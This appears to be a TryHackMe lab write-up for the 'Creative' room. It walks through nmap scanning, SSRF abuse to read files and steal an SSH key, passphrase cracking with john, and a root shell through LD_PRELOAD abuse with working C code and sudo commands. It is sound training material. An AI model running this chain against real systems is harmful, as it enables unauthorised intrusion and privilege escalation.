The following post by anthonyjsaab is licensed under
0 - Introduction
Link to room:
This writeup walks you through a room on TryHackMe created by tryhackme and ssaadakhtarr
1 - Scanning
1a - Nmap
1ai - Port Discovery
โโโ(kaliใฟkali)-[~/Desktop]
โโ$ sudo nmap 10.10.194.114 -sS -T5 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 10:11 EEST
Nmap scan report for 10.10.194.114
Host is up (0.11s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 130.06 seconds
1aii - Versioning
โโโ(kaliใฟkali)-[~/Desktop]
โโ$ nmap -sC -sV -p22,80 10.10.194.114
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 10:16 EEST
Nmap scan report for 10.10.194.114
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 a0:5c:1c:4e:b4:86:cf:58:9f:22:f9:7c:54:3d:7e:7b (RSA)
| 256 47:d5:bb:58:b6:c5:cc:e3:6c:0b:00:bd:95:d2:a0:fb (ECDSA)
|_ 256 cb:7c:ad:31:41:bb:98:af:cf:eb:e4:88:7f:12:5e:89 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://creative.thm
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds
1aiii - Checking for vulnerabilities
โโโ(kaliใฟkali)-[~/Desktop]
โโ$ nmap -sV --script vulners 10.10.194.114
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 10:18 EEST
Nmap scan report for 10.10.194.114
Host is up (0.099s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
| CVE-2012-1577 7.5 https://vulners.com/cve/CVE-2012-1577
| PRION:CVE-2020-15778 6.8 https://vulners.com/prion/PRION:CVE-2020-15778
| CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778
| C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 6.8 https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3 *EXPLOIT*
| 10213DBE-F683-58BB-B6D3-353173626207 6.8 https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207 *EXPLOIT*
| PRION:CVE-2020-12062 5.0 https://vulners.com/prion/PRION:CVE-2020-12062
| CVE-2020-12062 5.0 https://vulners.com/cve/CVE-2020-12062
| CVE-2010-4816 5.0 https://vulners.com/cve/CVE-2010-4816
| PRION:CVE-2021-28041 4.6 https://vulners.com/prion/PRION:CVE-2021-28041
| CVE-2021-28041 4.6 https://vulners.com/cve/CVE-2021-28041
| PRION:CVE-2021-41617 4.4 https://vulners.com/prion/PRION:CVE-2021-41617
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| PRION:CVE-2020-14145 4.3 https://vulners.com/prion/PRION:CVE-2020-14145
| PRION:CVE-2016-20012 4.3 https://vulners.com/prion/PRION:CVE-2016-20012
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2016-20012 4.3 https://vulners.com/cve/CVE-2016-20012
| CVE-2023-51767 3.5 https://vulners.com/cve/CVE-2023-51767
| PRION:CVE-2021-36368 2.6 https://vulners.com/prion/PRION:CVE-2021-36368
|_ CVE-2021-36368 2.6 https://vulners.com/cve/CVE-2021-36368
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.30 seconds
1aiv - OS Fingerprinting
โโโ(kaliใฟkali)-[~/Desktop]
โโ$ sudo nmap -O 10.10.194.114
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 10:20 EEST
Nmap scan report for 10.10.194.114
Host is up (0.096s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|storage-misc
Running (JUST GUESSING): Crestron 2-Series (86%), HP embedded (85%)
OS CPE: cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3
Aggressive OS guesses: Crestron XPanel control system (86%), HP P2000 G3 NAS device (85%)
No exact OS matches for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.19 seconds
1b - Directory busting
1bi - Fixing /etc/hosts
Before executing a directory busting scan, we have to check if we can access the supposed website on the target machine normally. When we try, we find that the webserver returns this:
โโโ(kaliใฟkali)-[~/Desktop]
โโ$ curl http://10.10.194.114 -vvv
* Trying 10.10.194.114:80...
* Connected to 10.10.194.114 (10.10.194.114) port 80
> GET / HTTP/1.1
> Host: 10.10.194.114
> User-Agent: curl/8.5.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Server: nginx/1.18.0 (Ubuntu)
< Date: Mon, 22 Apr 2024 07:11:40 GMT
< Content-Type: text/html
< Content-Length: 178
< Connection: keep-alive
< Location: http://creative.thm
<
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>
* Connection #0 to host 10.10.194.114 left intact
Thus, we should do:
โโโ(kaliใฟkali)-[~/Desktop]
โโ$ echo "10.10.194.114\tcreative.thm" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.194.114 creative.thm
โโโ(kaliใฟkali)-[~/Desktop]
โโ$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.194.114 creative.thm
The target machine exposes 2 ports: 22 (ssh) and 80 (http)
The CVEs returned seem to be very useful.
Subdomain enumeration returned one interesting vhost to checkout
2 - beta.creative.thm
2a - First contact
This webpage is very interesting. I spin up an HTTP server on my Kali machine to see what it really does:
โโโ(kaliใฟkali)-[~/Desktop]
โโ$ echo "10.10.4.16\tbeta.creative.thm" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.4.16 beta.creative.thm
โโโ(kaliใฟkali)-[~/Desktop]
โโ$ mkdir testdir && cd testdir && python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.4.16 - - [22/Apr/2024 15:44:38] "GET / HTTP/1.1" 200 -
Thus, the target machine seems to work like a forward proxy here.
2b - Python worker
Let us examine the behavior of this page further. Putting a URL to an inexistant file gives us the following:
From the user-agent shown above, and from the difference in beta's behavior when given a good or bad URL, it seems like beta launches a Python worker to download the resource requested. Then, it would send it to us. When the Python worker receives a 404, it crashes or terminates gracefully.
2c - Internal Nmap and Proxy (kinda)
When we submit http://localhost or http://127.0.0.1 in beta, it correctly returns the creative.thm webpage. However, http://localhost:22 will return "Dead".
It means that beta can tell us whether a port is locally open and bound to 127.0.0.1 on the condition that it belongs to an HTTP server. We can use beta as an Nmap for HTTP servers, and the scan is launched from the target machine, not our IP address.
In the above code block, I've generated a list of all possible ports. Then, using a sample request-response pair from beta.creative.thm, I crafted a gobuster incantation that communicates correctly with the endpoint. It sends to the same endpoint 2^32 requests that differ only by the port included in the body. For any particular response, if the length is 13, it means the server returned "Dead". Thus, we excluded this case.
As we can see, we found that an HTTP server is bound to 127.0.0.1:1337 of the target machine.
When we request this page via our forward proxy (aka beta.creative.thm), we get this:
Voila! The HTTP server at 127.0.0.1:1337 returns a directory listing at the root of the filesystem! This is cool. However, each time we want to access a file or change directory, we need to go back to beta's landing page and submit the new path. It is not quite like a shell.
Unfortunately, we cannot access /root/ just yet. However, we can access /home/ and we see this:
We have our first flag! user.txt is here and we can access it. Now, to have a decent shell so we can continue to priv esc, we can go to .ssh and retrieve the private keys of the "saad" user.
3 - Foothold using saad account
3a - Trying to login
Using the above SSH private key, we can try to login to the target machine:
We have a small problem. We do not know the SSH key's passphrase. We have to crack it.
3b - Cracking the passphrase
โโโ(kaliใฟkali)-[~/Downloads]
โโ$ ssh2john id_rsa > saad.hash
โโโ(kaliใฟkali)-[~/Downloads]
โโ$ john --wordlist=/usr/share/wordlists/seclists/Passwords/probable-v2-top12000.txt saad.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sweetness (id_rsa)
1g 0:00:00:29 DONE (2024-05-04 11:23) 0.03444g/s 82.67p/s 82.67c/s 82.67C/s alexia..grateful
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Sweet! We cracked the passphrase.
3c - Foothold
โโโ(kaliใฟkali)-[~/Downloads]
โโ$ ssh -i ./id_rsa saad@creative.thm
Enter passphrase for key './id_rsa':
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 04 May 2024 08:25:43 AM UTC
System load: 0.0 Processes: 115
Usage of /: 57.3% of 8.02GB Users logged in: 0
Memory usage: 26% IPv4 address for eth0: 10.10.2.249
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
58 updates can be applied immediately.
33 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Mon Nov 6 07:56:40 2023 from 192.168.8.102
saad@m4lware:~$ ls -la
total 52
drwxr-xr-x 7 saad saad 4096 Jan 21 2023 .
drwxr-xr-x 3 root root 4096 Jan 20 2023 ..
-rw------- 1 saad saad 362 Jan 21 2023 .bash_history
-rw-r--r-- 1 saad saad 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 saad saad 3797 Jan 21 2023 .bashrc
drwx------ 2 saad saad 4096 Jan 20 2023 .cache
drwx------ 3 saad saad 4096 Jan 20 2023 .gnupg
drwxrwxr-x 3 saad saad 4096 Jan 20 2023 .local
-rw-r--r-- 1 saad saad 807 Feb 25 2020 .profile
drwx------ 3 saad saad 4096 Jan 20 2023 snap
drwx------ 2 saad saad 4096 Jan 21 2023 .ssh
-rwxr-xr-x 1 root root 150 Jan 20 2023 start_server.py
-rw-r--r-- 1 saad saad 0 Jan 20 2023 .sudo_as_admin_successful
-rw-rw---- 1 saad saad 33 Jan 21 2023 user.txt
saad@m4lware:~$
4 - PrivEsc
First of all, we can find the password of the saad account in the bash history:
saad@m4lware:~$ head .bash_history
whoami
pwd
ls -al
ls
cd ..
sudo -l
echo "saad:MyStrongestPasswordYet$4291" > creds.txt
rm creds.txt
sudo -l
whomai
We can now proceed with some classical manual enumeration commands:
saad@m4lware:~$ sudo -l
[sudo] password for saad:
Matching Defaults entries for saad on m4lware:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
env_keep+=LD_PRELOAD
User saad may run the following commands on m4lware:
(root) /usr/bin/ping
saad@m4lware:~$
Using ping as root does not help us. However, using ping as root while overwriting the LD_PRELOAD variable effectively lets us run anything as root!
saad@m4lware:~$ cat shared_bash.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
saad@m4lware:~$ gcc -fPIC -shared -o shell.so shared_bash.c -nostartfiles
shared_bash.c: In function โ_initโ:
shared_bash.c:7:1: warning: implicit declaration of function โsetgidโ [-Wimplicit-function-declaration]
7 | setgid(0);
| ^~~~~~
shared_bash.c:8:1: warning: implicit declaration of function โsetuidโ [-Wimplicit-function-declaration]
8 | setuid(0);
| ^~~~~~
saad@m4lware:~$ sudo LD_PRELOAD=shell.so ping
ERROR: ld.so: object 'shell.so' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.
ping: usage error: Destination address required
saad@m4lware:~$ sudo LD_PRELOAD=/home/saad/shell.so ping
root@m4lware:/home/saad# whoami
root
root@m4lware:/home/saad# ls /root
root.txt snap
root@m4lware:/home/saad#
The request log shown above was triggered by manually putting "" in beta.creative.thm's input field and submitting. Here is the output on the browser:
